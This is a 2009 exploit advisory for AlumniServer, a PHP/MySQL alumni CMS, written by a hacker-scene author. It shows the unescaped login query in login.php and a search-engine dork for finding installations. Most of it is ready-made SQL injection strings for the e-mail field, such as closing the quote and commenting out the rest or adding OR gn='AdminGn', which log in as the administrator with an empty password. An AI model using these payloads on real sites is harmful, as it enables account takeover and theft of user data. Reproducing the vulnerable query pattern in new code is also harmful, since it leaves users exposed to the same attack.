CMS INFORMATION:
–>WEB: http://www.alumniserver.net/
–>DOWNLOAD: http://www.alumniserver.net/
–>DEMO: N/A
–>CATEGORY: CMS/Education
–>DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
and companies. Services for usersinclude profile page,…
–>RELEASED: 2009-06-11
CMS VULNERABILITY:
–>TESTED ON: firefox 3
–>DORK: "AlumniServer project"
–>CATEGORY: AUTH-BYPASS (SQLi)
–>AFFECT VERSION: CURRENT
–>Discovered Bug date: 2009-06-16
–>Reported Bug date: 2009-06-16
–>Fixed bug date: N/A
–>Info patch (???): N/A
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#####################
////////////////////
AUTH-BYPASS (SQLi):
////////////////////
#####################
<<<<---------++++++++++++++ Condition: magic quotes=OFF ++++++++++++++++±-------->>>>
Path –> [HOME_PATH]/login.php
Lines –> 26, 32, 72
//Note: requestVar is a function against LFI and XSS mainly,
//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars.
…
26: $email=requestVar('login','',true);
…
32: $pwd=requestVar('password','',true);
…
72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE
'".md5($pwd)."') LIMIT 1",$dbh); <– Vuln line
…
[!!!] Case-1: If only one user (rarely)…
~~~~~> Password=nothing
[!!!] Case-2: If more users...
[++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php):
~~~~~> E-Mail=[real_admin_mail]')/*
~~~~~> Password=nothing
[++] Note: Search for first or second name.
[++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a
registered user
is easy to get necessary information.
~~~~~> [email protected]') OR gn='AdminGn' /*
~~~~~> Password=nothing
[!!!] Case-3: If admin is a hidden user...
~~~~~> [email protected]') OR hideuser='y' /*
~~~~~> Password=nothing
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################